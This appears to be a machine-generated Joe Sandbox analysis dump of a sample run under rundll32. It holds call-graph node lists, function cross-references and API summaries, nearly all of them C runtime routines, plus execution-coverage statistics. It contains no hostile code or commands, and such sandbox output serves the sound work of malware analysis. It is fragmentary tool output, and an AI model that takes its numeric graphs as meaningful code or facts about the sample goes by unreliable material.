1468->1465 1470 4bdb319 1469->1470 1474 4bdb334 1469->1474 1471 4bdb325 1470->1471 1470->1474 1473 4bc8edb __mtinitlocknum 53 API calls 1471->1473 1472 4bdb344 HeapAlloc 1472->1474 1475 4bdb32a 1472->1475 1473->1475 1474->1472 1474->1475 1475->1449 1476->1449 1478 4bcf67e EnterCriticalSection 1477->1478 1479 4bcf66b 1477->1479 1478->1456 1490 4bcf6e2 1479->1490 1481 4bcf671 1481->1478 1512 4bd308a 1481->1512 1678 4bcf7c4 LeaveCriticalSection 1484->1678 1486 4bd4618 1486->1459 1679 4bcf7c4 LeaveCriticalSection 1487->1679 1489 4bd4666 1489->1462 1491 4bcf6ee _doexit 1490->1491 1505 4bcf70d 1491->1505 1521 4bd6a3a 1491->1521 1497 4bcf73a 1502 4bcf65a _doexit 54 API calls 1497->1502 1498 4bcf72b 1501 4bc8edb __mtinitlocknum 54 API calls 1498->1501 1499 4bcf730 _doexit 1499->1481 1500 4bcf703 1558 4bd2f67 1500->1558 1501->1499 1504 4bcf741 1502->1504 1506 4bcf74e 1504->1506 1507 4bcf766 1504->1507 1505->1499 1561 4bd08df 1505->1561 1565 4bd0e88 1506->1565 1509 4bc8bc4 _free 54 API calls 1507->1509 1510 4bcf75a 1509->1510 1568 4bcf782 1510->1568 1513 4bd6a3a __FF_MSGBANNER 54 API calls 1512->1513 1514 4bd3092 1513->1514 1515 4bd6a97 __NMSG_WRITE 54 API calls 1514->1515 1516 4bd309a 1515->1516 1648 4bd3139 1516->1648 1520 4bcf67d 1520->1478 1571 4bdf0af 1521->1571 1523 4bd6a41 1524 4bdf0af __FF_MSGBANNER 54 API calls 1523->1524 1527 4bd6a4e 1523->1527 1524->1527 1525 4bd6a97 __NMSG_WRITE 54 API calls 1526 4bd6a66 1525->1526 1529 4bd6a97 __NMSG_WRITE 54 API calls 1526->1529 1527->1525 1528 4bcf6fc 1527->1528 1530 4bd6a97 1528->1530 1529->1528 1531 4bd6ab5 __NMSG_WRITE 1530->1531 1532 4bd6bdc 1531->1532 1533 4bdf0af __FF_MSGBANNER 51 API calls 1531->1533 1532->1500 1534 4bd6ac8 1533->1534 1535 4bd6be1 GetStdHandle 1534->1535 1536 4bdf0af __FF_MSGBANNER 51 API calls 1534->1536 1535->1532 1539 4bd6bef _strlen 1535->1539 1537 4bd6ad9 1536->1537 1537->1535 1538 4bd6aeb 1537->1538 1538->1532 1593 4bdd3d6 1538->1593 1539->1532 1541 4bd6c28 WriteFile 1539->1541 1541->1532 1543 4bd6c49 1546 4bd4398 __invoke_watson 6 API calls 1543->1546 1544 4bd6b18 GetModuleFileNameW 1545 4bd6b38 1544->1545 1550 4bd6b48 __NMSG_WRITE 1544->1550 1547 4bdd3d6 __NMSG_WRITE 51 API calls 1545->1547 1548 4bd6c53 1546->1548 1547->1550 1549 4bd6b8e 1549->1543 1611 4bdef85 1549->1611 1550->1543 1550->1549 1602 4bdeff1 1550->1602 1554 4bdef85 __NMSG_WRITE 51 API calls 1555 4bd6bc5 1554->1555 1555->1543 1556 4bd6bcc 1555->1556 1620 4bdf0ef EncodePointer 1556->1620 1643 4bd2f33 GetModuleHandleExW 1558->1643 1564 4bd08ed 1561->1564 1562 4bcf724 1562->1497 1562->1498 1564->1562 1646 4bd1181 Sleep 1564->1646 1566 4bd0e98 1565->1566 1567 4bd0ea5 InitializeCriticalSectionAndSpinCount 1565->1567 1566->1510 1567->1510 1647 4bcf7c4 LeaveCriticalSection 1568->1647 1570 4bcf789 1570->1499 1572 4bdf0b9 1571->1572 1573 4bc8edb __mtinitlocknum 54 API calls 1572->1573 1575 4bdf0c3 1572->1575 1574 4bdf0df 1573->1574 1578 4bd4388 1574->1578 1575->1523 1581 4bd435d DecodePointer 1578->1581 1582 4bd4370 1581->1582 1587 4bd4398 IsProcessorFeaturePresent 1582->1587 1585 4bd435d __except_handler4 6 API calls 1586 4bd4394 1585->1586 1586->1523 1588 4bd43a3 1587->1588 1589 4bd422b __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter IsDebuggerPresent 1588->1589 1590 4bd43b8 1589->1590 1591 4bd118f __invoke_watson GetCurrentProcess TerminateProcess 1590->1591 1592 4bd4387 1591->1592 1592->1585 1594 4bdd3e1 1593->1594 1596 4bdd3ef 1593->1596 1594->1596 1600 4bdd408 1594->1600 1595 4bc8edb __mtinitlocknum 54 API calls 1597 4bdd3f9 1595->1597 1596->1595 1598 4bd4388 __except_handler4 7 API calls 1597->1598 1599 4bd6b0b 1598->1599 1599->1543 1599->1544 1600->1599 1601 4bc8edb __mtinitlocknum 54 API calls 1600->1601 1601->1597 1606 4bdefff 1602->1606 1603 4bdf003 1604 4bc8edb __mtinitlocknum 54 API calls 1603->1604 1605 4bdf008 1603->1605 1607 4bdf033 1604->1607 1605->1549 1606->1603 1606->1605 1609 4bdf042 1606->1609 1608 4bd4388 __except_handler4 7 API calls 1607->1608 1608->1605 1609->1605 1610 4bc8edb __mtinitlocknum 54 API calls 1609->1610 1610->1607 1613 4bdef9f 1611->1613 1615 4bdef91 1611->1615 1612 4bc8edb __mtinitlocknum 54 API calls 1614 4bdefa9 1612->1614 1613->1612 1616 4bd4388 __except_handler4 7 API calls 1614->1616 1615->1613 1618 4bdefcb 1615->1618 1617 4bd6bae 1616->1617 1617->1543 1617->1554 1618->1617 1619 4bc8edb __mtinitlocknum 54 API calls 1618->1619 1619->1614 1621 4bdf123 ___crtIsPackagedApp 1620->1621 1622 4bdf1e2 IsDebuggerPresent 1621->1622 1623 4bdf132 LoadLibraryExW 1621->1623 1626 4bdf1ec 1622->1626 1627 4bdf207 1622->1627 1624 4bdf16f GetProcAddress 1623->1624 1625 4bdf149 GetLastError 1623->1625 1631 4bdf183 7 API calls 1624->1631 1636 4bdf1ff 1624->1636 1630 4bdf158 LoadLibraryExW 1625->1630 1625->1636 1628 4bdf1fa 1626->1628 1632 4bdf1f3 OutputDebugStringW 1626->1632 1627->1628 1629 4bdf20c DecodePointer 1627->1629 1633 4bdf24b 1628->1633 1628->1636 1638 4bdf233 DecodePointer DecodePointer 1628->1638 1629->1636 1630->1624 1630->1636 1634 4bdf1df 1631->1634 1635 4bdf1cb GetProcAddress EncodePointer 1631->1635 1632->1628 1637 4bdf283 DecodePointer 1633->1637 1642 4bdf26f DecodePointer 1633->1642 1634->1622 1635->1634 1636->1532 1639 4bdf28a 1637->1639 1637->1642 1638->1633 1641 4bdf29b DecodePointer 1639->1641 1639->1642 1641->1642 1642->1636 1644 4bd2f4c GetProcAddress 1643->1644 1645 4bd2f5e ExitProcess 1643->1645 1644->1645 1646->1564 1647->1570 1649 4bd31ef _doexit 54 API calls 1648->1649 1650 4bd30a5 1649->1650 1651 4bd31ef 1650->1651 1652 4bd31fb _doexit 1651->1652 1653 4bcf65a _doexit 47 API calls 1652->1653 1654 4bd3202 1653->1654 1655 4bd3230 DecodePointer 1654->1655 1657 4bd32bb __initterm 1654->1657 1655->1657 1658 4bd3247 DecodePointer 1655->1658 1671 4bd3309 1657->1671 1664 4bd3257 1658->1664 1660 4bd3318 _doexit 1660->1520 1662 4bd3264 EncodePointer 1662->1664 1663 4bd3300 1665 4bd2f67 _doexit 3 API calls 1663->1665 1664->1657 1664->1662 1667 4bd3274 DecodePointer EncodePointer 1664->1667 1666 4bd3309 1665->1666 1668 4bd3316 1666->1668 1676 4bcf7c4 LeaveCriticalSection 1666->1676 1669 4bd3286 DecodePointer DecodePointer 1667->1669 1668->1520 1669->1664 1672 4bd330f 1671->1672 1673 4bd32e9 1671->1673 1677 4bcf7c4 LeaveCriticalSection 1672->1677 1673->1660 1675 4bcf7c4 LeaveCriticalSection 1673->1675 1675->1663 1676->1668 1677->1673 1678->1486 1679->1489 1693 4bd33b0 1696 4bd33da __except_handler4 __IsNonwritableInCurrentImage 1693->1696 1694 4bd34c4 __except_handler4 1696->1694 1733 4bd7492 RtlUnwind 1696->1733 1697 4bd348c __except_handler4 1698 4bd357b 1697->1698 1699 4bd3681 1697->1699 1735 4bde1c6 1698->1735 1701 4bd36d4 1699->1701 1702 4bd3686 1699->1702 1707 4bd2c29 __except_handler4 GetLocaleInfoW 1701->1707 1713 4bd363c 1701->1713 1749 4bd2c29 1702->1749 1705 4bd35a8 GetLastError 1708 4bd35b7 1705->1708 1705->1713 1706 4bd3695 1709 4bd36be 1706->1709 1712 4bd0897 __calloc_crt 54 API calls 1706->1712 1707->1713 1711 4bde1c6 ___crtGetLocaleInfoA 56 API calls 1708->1711 1709->1713 1714 4bc8bc4 _free 54 API calls 1709->1714 1710 4bd0897 __calloc_crt 54 API calls 1715 4bd3624 1710->1715 1716 4bd35cd 1711->1716 1717 4bd36a6 1712->1717 1714->1713 1718 4bd362e 1715->1718 1719 4bd3651 1715->1719 1716->1713 1722 4bd0897 __calloc_crt 54 API calls 1716->1722 1717->1709 1723 4bd2c29 __except_handler4 GetLocaleInfoW 1717->1723 1718->1713 1721 4bc8bc4 _free 54 API calls 1718->1721 1740 4bde03e 1719->1740 1721->1713 1725 4bd35e2 1722->1725 1723->1709 1725->1713 1730 4bde1c6 ___crtGetLocaleInfoA 56 API calls 1725->1730 1726 4bd366e 1726->1713 1731 4bc8bc4 _free 54 API calls 1726->1731 1727 4bd3712 1728 4bd4398 __invoke_watson 6 API calls 1727->1728 1729 4bd371c 1728->1729 1732 4bd360f 1730->1732 1731->1713 1732->1710 1732->1718 1734 4bd74a6 1733->1734 1734->1697 1753 4bcca16 1735->1753 1739 4bd359b 1739->1705 1739->1732 1743 4bde04c 1740->1743 1741 4bde050 1742 4bc8edb __mtinitlocknum 54 API calls 1741->1742 1744 4bd3663 1741->1744 1748 4bde07b 1742->1748 1743->1741 1743->1744 1746 4bde08a 1743->1746 1744->1726 1744->1727 1745 4bd4388 __except_handler4 7 API calls 1745->1744 1746->1744 1747 4bc8edb __mtinitlocknum 54 API calls 1746->1747 1747->1748 1748->1745 1750 4bd2c49 __except_handler4 1749->1750 1751 4bd2c45 1749->1751 1752 4bd2c4e GetLocaleInfoW 1750->1752 1751->1706 1752->1706 1754 4bcca27 1753->1754 1758 4bcca74 1753->1758 1770 4bd452e 1754->1770 1757 4bcca54 1757->1758 1790 4bd9b58 1757->1790 1761 4bde0e2 1758->1761 1762 4bd2c29 __except_handler4 GetLocaleInfoW 1761->1762 1763 4bde10e __crtGetLocaleInfoA_stat 1762->1763 1764 4bde117 1763->1764 1765 4bd2c29 __except_handler4 GetLocaleInfoW 1763->1765 1764->1739 1767 4bde182 1765->1767 1766 4bde1a9 2060 4bd0879 1766->2060 1767->1766 1769 4bde19a WideCharToMultiByte 1767->1769 1769->1766 1771 4bd4546 __getptd_noexit 54 API calls 1770->1771 1772 4bd4534 1771->1772 1773 4bcca2d 1772->1773 1774 4bd308a _LocaleUpdate::_LocaleUpdate 54 API calls 1772->1774 1773->1757 1775 4bd6ee3 1773->1775 1774->1773 1776 4bd6eef _doexit 1775->1776 1777 4bd452e _LocaleUpdate::_LocaleUpdate 54 API calls 1776->1777 1778 4bd6ef8 1777->1778 1779 4bd6f27 1778->1779 1780 4bd6f0b 1778->1780 1781 4bcf65a _doexit 54 API calls 1779->1781 1783 4bd452e _LocaleUpdate::_LocaleUpdate 54 API calls 1780->1783 1782 4bd6f2e 1781->1782 1802 4bd6f63 1782->1802 1786 4bd6f10 1783->1786 1788 4bd6f1e _doexit 1786->1788 1789 4bd308a _LocaleUpdate::_LocaleUpdate 54 API calls 1786->1789 1788->1757 1789->1788 1791 4bd9b64 _doexit 1790->1791 1792 4bd452e _LocaleUpdate::_LocaleUpdate 54 API calls 1791->1792 1793 4bd9b6e 1792->1793 1794 4bcf65a _doexit 54 API calls 1793->1794 1799 4bd9b80 1793->1799 1795 4bd9b9e 1794->1795 1800 4bc8bc4 _free 54 API calls 1795->1800 1801 4bd9bcb 1795->1801 1797 4bd308a _LocaleUpdate::_LocaleUpdate 54 API calls 1798 4bd9b8e _doexit 1797->1798 1798->1758 1799->1797 1799->1798 1800->1801 2056 4bd9bf5 1801->2056 1803 4bd6f42 1802->1803 1804 4bd6f6e ___addlocaleref ___removelocaleref 1802->1804 1806 4bd6f5a 1803->1806 1804->1803 1809 4bd6ce9 1804->1809 2055 4bcf7c4 LeaveCriticalSection 1806->2055 1808 4bd6f61 1808->1786 1810 4bd6cfe 1809->1810 1811 4bd6d62 1809->1811 1810->1811 1814 4bd6d2f 1810->1814 1821 4bc8bc4 _free 54 API calls 1810->1821 1812 4bd6daf 1811->1812 1813 4bc8bc4 _free 54 API calls 1811->1813 1835 4bd6dd8 1812->1835 1879 4bdf9df 1812->1879 1816 4bd6d83 1813->1816 1818 4bd6d4d 1814->1818 1828 4bc8bc4 _free 54 API calls 1814->1828 1819 4bc8bc4 _free 54 API calls 1816->1819 1820 4bc8bc4 _free 54 API calls 1818->1820 1824 4bd6d96 1819->1824 1825 4bd6d57 1820->1825 1826 4bd6d24 1821->1826 1822 4bc8bc4 _free 54 API calls 1822->1835 1823 4bd6e37 1827 4bc8bc4 _free 54 API calls 1823->1827 1830 4bc8bc4 _free 54 API calls 1824->1830 1831 4bc8bc4 _free 54 API calls 1825->1831 1839 4bdf2d5 1826->1839 1833 4bd6e3d 1827->1833 1834 4bd6d42 1828->1834 1829 4bc8bc4 54 API calls _free 1829->1835 1836 4bd6da4 1830->1836 1831->1811 1833->1803 1867 4bdf772 1834->1867 1835->1823 1835->1829 1838 4bc8bc4 _free 54 API calls 1836->1838 1838->1812 1840 4bdf2e4 1839->1840 1866 4bdf3cd 1839->1866 1841 4bc8bc4 _free 54 API calls 1840->1841 1843 4bdf2f5 1840->1843 1841->1843 1842 4bdf307 1844 4bdf319 1842->1844 1846 4bc8bc4 _free 54 API calls 1842->1846 1843->1842 1845 4bc8bc4 _free 54 API calls 1843->1845 1847 4bdf32b 1844->1847 1848 4bc8bc4 _free 54 API calls 1844->1848 1845->1842 1846->1844 1849 4bdf33d 1847->1849 1850 4bc8bc4 _free 54 API calls 1847->1850 1848->1847 1851 4bdf34f 1849->1851 1853 4bc8bc4 _free 54 API calls 1849->1853 1850->1849 1852 4bdf361 1851->1852 1854 4bc8bc4 _free 54 API calls 1851->1854 1855 4bdf373 1852->1855 1856 4bc8bc4 _free 54 API calls 1852->1856 1853->1851 1854->1852 1857 4bdf385 1855->1857 1858 4bc8bc4 _free 54 API calls 1855->1858 1856->1855 1859 4bdf397 1857->1859 1861 4bc8bc4 _free 54 API calls 1857->1861 1858->1857 1860 4bdf3a9 1859->1860 1862 4bc8bc4 _free 54 API calls 1859->1862 1863 4bdf3bb 1860->1863 1864 4bc8bc4 _free 54 API calls 1860->1864 1861->1859 1862->1860 1865 4bc8bc4 _free 54 API calls 1863->1865 1863->1866 1864->1863 1865->1866 1866->1814 1868 4bdf77d 1867->1868 1878 4bdf7d5 1867->1878 1869 4bdf78d 1868->1869 1871 4bc8bc4 _free 54 API calls 1868->1871 1870 4bdf79f 1869->1870 1872 4bc8bc4 _free 54 API calls 1869->1872 1873 4bdf7b1 1870->1873 1874 4bc8bc4 _free 54 API calls 1870->1874 1871->1869 1872->1870 1875 4bc8bc4 _free 54 API calls 1873->1875 1876 4bdf7c3 1873->1876 1874->1873 1875->1876 1877 4bc8bc4 _free 54 API calls 1876->1877 1876->1878 1877->1878 1878->1818 1880 4bdf9ee 1879->1880 2054 4bd6dcd 1879->2054 1881 4bc8bc4 _free 54 API calls 1880->1881 1882 4bdf9f6 1881->1882 1883 4bc8bc4 _free 54 API calls 1882->1883 1884 4bdf9fe 1883->1884 1885 4bc8bc4 _free 54 API calls 1884->1885 1886 4bdfa06 1885->1886 1887 4bc8bc4 _free 54 API calls 1886->1887 1888 4bdfa0e 1887->1888 1889 4bc8bc4 _free 54 API calls 1888->1889 1890 4bdfa16 1889->1890 1891 4bc8bc4 _free 54 API calls 1890->1891 1892 4bdfa1e 1891->1892 1893 4bc8bc4 _free 54 API calls 1892->1893 1894 4bdfa25 1893->1894 1895 4bc8bc4 _free 54 API calls 1894->1895 1896 4bdfa2d 1895->1896 1897 4bc8bc4 _free 54 API calls 1896->1897 1898 4bdfa35 1897->1898 1899 4bc8bc4 _free 54 API calls 1898->1899 1900 4bdfa3d 1899->1900 1901 4bc8bc4 _free 54 API calls 1900->1901 1902 4bdfa45 1901->1902 1903 4bc8bc4 _free 54 API calls 1902->1903 1904 4bdfa4d 1903->1904 1905 4bc8bc4 _free 54 API calls 1904->1905 1906 4bdfa55 1905->1906 1907 4bc8bc4 _free 54 API calls 1906->1907 1908 4bdfa5d 1907->1908 1909 4bc8bc4 _free 54 API calls 1908->1909 1910 4bdfa65 1909->1910 1911 4bc8bc4 _free 54 API calls 1910->1911 1912 4bdfa6d 1911->1912 1913 4bc8bc4 _free 54 API calls 1912->1913 1914 4bdfa78 1913->1914 1915 4bc8bc4 _free 54 API calls 1914->1915 1916 4bdfa80 1915->1916 1917 4bc8bc4 _free 54 API calls 1916->1917 1918 4bdfa88 1917->1918 1919 4bc8bc4 _free 54 API calls 1918->1919 1920 4bdfa90 1919->1920 1921 4bc8bc4 _free 54 API calls 1920->1921 1922 4bdfa98 1921->1922 1923 4bc8bc4 _free 54 API calls 1922->1923 1924 4bdfaa0 1923->1924 1925 4bc8bc4 _free 54 API calls 1924->1925 1926 4bdfaa8 1925->1926 1927 4bc8bc4 _free 54 API calls 1926->1927 1928 4bdfab0 1927->1928 1929 4bc8bc4 _free 54 API calls 1928->1929 1930 4bdfab8 1929->1930 1931 4bc8bc4 _free 54 API calls 1930->1931 1932 4bdfac0 1931->1932 1933 4bc8bc4 _free 54 API calls 1932->1933 1934 4bdfac8 1933->1934 1935 4bc8bc4 _free 54 API calls 1934->1935 1936 4bdfad0 1935->1936 1937 4bc8bc4 _free 54 API calls 1936->1937 1938 4bdfad8 1937->1938 1939 4bc8bc4 _free 54 API calls 1938->1939 1940 4bdfae0 1939->1940 1941 4bc8bc4 _free 54 API calls 1940->1941 1942 4bdfae8 1941->1942 1943 4bc8bc4 _free 54 API calls 1942->1943 1944 4bdfaf0 1943->1944 1945 4bc8bc4 _free 54 API calls 1944->1945 1946 4bdfafe 1945->1946 1947 4bc8bc4 _free 54 API calls 1946->1947 1948 4bdfb09 1947->1948 1949 4bc8bc4 _free 54 API calls 1948->1949 1950 4bdfb14 1949->1950 1951 4bc8bc4 _free 54 API calls 1950->1951 1952 4bdfb1f 1951->1952 1953 4bc8bc4 _free 54 API calls 1952->1953 1954 4bdfb2a 1953->1954 1955 4bc8bc4 _free 54 API calls 1954->1955 1956 4bdfb35 1955->1956 1957 4bc8bc4 _free 54 API calls 1956->1957 1958 4bdfb40 1957->1958 1959 4bc8bc4 _free 54 API calls 1958->1959 1960 4bdfb4b 1959->1960 1961 4bc8bc4 _free 54 API calls 1960->1961 1962 4bdfb56 1961->1962 1963 4bc8bc4 _free 54 API calls 1962->1963 1964 4bdfb61 1963->1964 1965 4bc8bc4 _free 54 API calls 1964->1965 1966 4bdfb6c 1965->1966 1967 4bc8bc4 _free 54 API calls 1966->1967 1968 4bdfb77 1967->1968 1969 4bc8bc4 _free 54 API calls 1968->1969 1970 4bdfb82 1969->1970 1971 4bc8bc4 _free 54 API calls 1970->1971 1972 4bdfb8d 1971->1972 1973 4bc8bc4 _free 54 API calls 1972->1973 1974 4bdfb98 1973->1974 1975 4bc8bc4 _free 54 API calls 1974->1975 1976 4bdfba3 1975->1976 1977 4bc8bc4 _free 54 API calls 1976->1977 1978 4bdfbb1 1977->1978 1979 4bc8bc4 _free 54 API calls 1978->1979 1980 4bdfbbc 1979->1980 1981 4bc8bc4 _free 54 API calls 1980->1981 1982 4bdfbc7 1981->1982 1983 4bc8bc4 _free 54 API calls 1982->1983 1984 4bdfbd2 1983->1984 1985 4bc8bc4 _free 54 API calls 1984->1985 1986 4bdfbdd 1985->1986 1987 4bc8bc4 _free 54 API calls 1986->1987 1988 4bdfbe8 1987->1988 1989 4bc8bc4 _free 54 API calls 1988->1989 1990 4bdfbf3 1989->1990 1991 4bc8bc4 _free 54 API calls 1990->1991 1992 4bdfbfe 1991->1992 1993 4bc8bc4 _free 54 API calls 1992->1993 1994 4bdfc09 1993->1994 1995 4bc8bc4 _free 54 API calls 1994->1995 1996 4bdfc14 1995->1996 1997 4bc8bc4 _free 54 API calls 1996->1997 1998 4bdfc1f 1997->1998 1999 4bc8bc4 _free 54 API calls 1998->1999 2000 4bdfc2a 1999->2000 2001 4bc8bc4 _free 54 API calls 2000->2001 2002 4bdfc35 2001->2002 2003 4bc8bc4 _free 54 API calls 2002->2003 2004 4bdfc40 2003->2004 2005 4bc8bc4 _free 54 API calls 2004->2005 2006 4bdfc4b 2005->2006 2007 4bc8bc4 _free 54 API calls 2006->2007 2008 4bdfc56 2007->2008 2009 4bc8bc4 _free 54 API calls 2008->2009 2010 4bdfc64 2009->2010 2011 4bc8bc4 _free 54 API calls 2010->2011 2012 4bdfc6f 2011->2012 2013 4bc8bc4 _free 54 API calls 2012->2013 2014 4bdfc7a 2013->2014 2015 4bc8bc4 _free 54 API calls 2014->2015 2016 4bdfc85 2015->2016 2017 4bc8bc4 _free 54 API calls 2016->2017 2018 4bdfc90 2017->2018 2019 4bc8bc4 _free 54 API calls 2018->2019 2020 4bdfc9b 2019->2020 2021 4bc8bc4 _free 54 API calls 2020->2021 2022 4bdfca6 2021->2022 2023 4bc8bc4 _free 54 API calls 2022->2023 2024 4bdfcb1 2023->2024 2025 4bc8bc4 _free 54 API calls 2024->2025 2026 4bdfcbc 2025->2026 2027 4bc8bc4 _free 54 API calls 2026->2027 2028 4bdfcc7 2027->2028 2029 4bc8bc4 _free 54 API calls 2028->2029 2030 4bdfcd2 2029->2030 2031 4bc8bc4 _free 54 API calls 2030->2031 2032 4bdfcdd 2031->2032 2033 4bc8bc4 _free 54 API calls 2032->2033 2034 4bdfce8 2033->2034 2035 4bc8bc4 _free 54 API calls 2034->2035 2036 4bdfcf3 2035->2036 2037 4bc8bc4 _free 54 API calls 2036->2037 2038 4bdfcfe 2037->2038 2039 4bc8bc4 _free 54 API calls 2038->2039 2040 4bdfd09 2039->2040 2041 4bc8bc4 _free 54 API calls 2040->2041 2042 4bdfd17 2041->2042 2043 4bc8bc4 _free 54 API calls 2042->2043 2044 4bdfd22 2043->2044 2045 4bc8bc4 _free 54 API calls 2044->2045 2046 4bdfd2d 2045->2046 2047 4bc8bc4 _free 54 API calls 2046->2047 2048 4bdfd38 2047->2048 2049 4bc8bc4 _free 54 API calls 2048->2049 2050 4bdfd43 2049->2050 2051 4bc8bc4 _free 54 API calls 2050->2051 2052 4bdfd4e 2051->2052 2053 4bc8bc4 _free 54 API calls 2052->2053 2053->2054 2054->1822 2055->1808 2059 4bcf7c4 LeaveCriticalSection 2056->2059 2058 4bd9bfc 2058->1799 2059->2058 2061 4bd0894 2060->2061 2062 4bd0883 2060->2062 2061->1764 2062->2061 2063 4bc8bc4 _free 54 API calls 2062->2063 2063->2061

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_04BD45B5 13 Function_04BD3395 0->13 97 Function_04BD465F 0->97 99 Function_04BCF65A 0->99 103 Function_04BD6C54 0->103 105 Function_04BD4656 0->105 106 Function_04BD3350 0->106 1 Function_04BA88B0 16 Function_04BA8890 1->16 2 Function_04BD0EB6 3 Function_04BD33B0 6 Function_04BD74AB 3->6 12 Function_04BD4398 3->12 15 Function_04BD0897 3->15 17 Function_04BD7492 3->17 54 Function_04BC8BC4 3->54 56 Function_04BDE1C6 3->56 58 Function_04BDE03E 3->58 65 Function_04BD2C29 3->65 81 Function_04BD7479 3->81 95 Function_04BD7462 3->95 110 Function_04BDDF40 3->110 4 Function_04B296A3 5 Function_04BDF0AF 20 Function_04BD4388 5->20 48 Function_04BC8EDB 5->48 84 Function_04BD7370 6->84 7 Function_04B390AA 8 Function_04BD11A4 9 Function_04BCF1A6 10 Function_04BA8FA0 32 Function_04BAA6F0 10->32 11 Function_04BD74A6 18 Function_04BD118F 12->18 66 Function_04BD422B 12->66 14 Function_04BD6A97 14->5 14->12 21 Function_04BC8C8B 14->21 23 Function_04BDEF85 14->23 33 Function_04BDEFF1 14->33 36 Function_04BDF0EF 14->36 51 Function_04BDD3D6 14->51 77 Function_04BC8C00 14->77 85 Function_04BD6A73 14->85 26 Function_04BD1181 15->26 73 Function_04BDB30E 15->73 50 Function_04BAB5D0 16->50 19 Function_04BD0E88 96 Function_04BD435D 20->96 22 Function_04BD308A 22->14 37 Function_04BD31EF 22->37 59 Function_04BD3139 22->59 60 Function_04BD6A3A 22->60 23->20 23->48 24 Function_04BD3185 25 Function_04AD1396 27 Function_04BCF782 55 Function_04BCF7C4 27->55 28 Function_04ACDAEE 29 Function_04B83DFE 30 Function_04BD9BF5 30->55 31 Function_04BCE8F5 32->4 32->28 53 Function_04ACDADA 32->53 33->20 33->48 34 Function_04BDDEF0 35 Function_04BE64F0 36->2 37->13 37->24 37->55 74 Function_04BD3309 37->74 91 Function_04BD2F67 37->91 37->99 37->106 38 Function_04BC8EEE 39 Function_04BD6CE9 45 Function_04BDF9DF 39->45 49 Function_04BDF2D5 39->49 39->54 86 Function_04BDF772 39->86 40 Function_04BE0FE5 41 Function_04BD6EE3 41->13 41->22 64 Function_04BD452E 41->64 94 Function_04BD6F63 41->94 41->99 101 Function_04BD6F5A 41->101 41->106 42 Function_04BCF6E2 42->13 42->14 42->19 42->27 44 Function_04BD08DF 42->44 42->48 42->54 42->60 42->91 42->99 42->106 43 Function_04BDE0E2 43->65 82 Function_04BD0879 43->82 109 Function_04BDD440 43->109 44->26 45->54 46 Function_04BA94DE 46->1 46->10 46->25 102 Function_04AC3A45 46->102 47 Function_04BCF7D9 47->13 47->31 47->106 108 Function_04BD4546 48->108 49->54 104 Function_04BAA750 50->104 51->20 51->48 52 Function_04BC92C9 54->38 54->48 56->43 71 Function_04BCCA16 56->71 57 Function_04ACDAD0 58->20 58->48 59->37 60->5 60->14 61 Function_04BC9130 62 Function_04BD2F33 63 Function_04BB3828 63->52 76 Function_04BC9307 63->76 93 Function_04BCE762 63->93 64->22 64->108 90 Function_04BD2B65 65->90 66->8 66->61 78 Function_04BDE200 66->78 67 Function_04AC3E3B 68 Function_04BA9320 69 Function_04AC3C0E 70 Function_04AC510B 70->69 71->41 71->64 98 Function_04BD9B58 71->98 72 Function_04BB3708 87 Function_04BB3768 72->87 73->48 74->55 75 Function_04BE1004 79 Function_04BDE000 80 Function_04BD7400 80->84 81->40 82->54 83 Function_04BB387D 83->72 83->93 84->40 84->75 86->54 88 Function_04B29166 89 Function_04BE4968 91->62 92 Function_04BD0E66 94->39 94->103 111 Function_04BD6E43 94->111 96->12 96->96 97->55 98->13 98->22 98->30 98->54 98->64 98->99 98->106 99->22 99->42 100 Function_04B39854 101->55 102->67 104->28 104->53 104->57 104->88 105->55 107 Function_04BD0E47 108->0 108->15 108->54 108->92 108->107 110->34 110->79

    Control-flow Graph

    APIs
    • __CxxThrowException@8.LIBCMT ref: 04BB38A5
      • Part of subcall function 04BCE762: RaiseException.KERNEL32(?,?,04BB38AA,?,?,?,?,?,?,?,04BB38AA,?,04C08510,?), ref: 04BCE7B7
    • __CxxThrowException@8.LIBCMT ref: 04BB38D3
    • std::regex_error::regex_error.LIBCPMT ref: 04BB38E5
    • __CxxThrowException@8.LIBCMT ref: 04BB38F3
    • __CxxThrowException@8.LIBCMT ref: 04BB3921
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.1337576998.0000000004AB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: true
    • Associated: 00000007.00000002.1337556450.0000000004AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.1337681182.0000000004C0A000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.1338077429.000000000507D000.00000002.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.1338098193.000000000507F000.00000040.00001000.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_4ab0000_rundll32.jbxd
    Similarity
    • API ID: Exception@8Throw$ExceptionRaisestd::regex_error::regex_error
    • String ID: AhxBPOGHKhAzyzIZP
    • API String ID: 3461588268-3120880352
    • Opcode ID: baee3d71151835eed37cf5ff938ef5065579965e76358eb7a1e08f5cc9b7027c
    • Instruction ID: 42c7606abafa3f38718bf92a9ace29eefedad9f4e65bf3a32e5145fb73672fe4
    • Opcode Fuzzy Hash: baee3d71151835eed37cf5ff938ef5065579965e76358eb7a1e08f5cc9b7027c
    • Instruction Fuzzy Hash: A311EC75D4020CBBAF04FFA4C489CDDBBBDAA14248F40C5A6AD6497641EB74F3498F91

    Execution Graph

    Execution Coverage:1.3%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:0%
    Total number of Nodes:624
    Total number of Limit Nodes:4
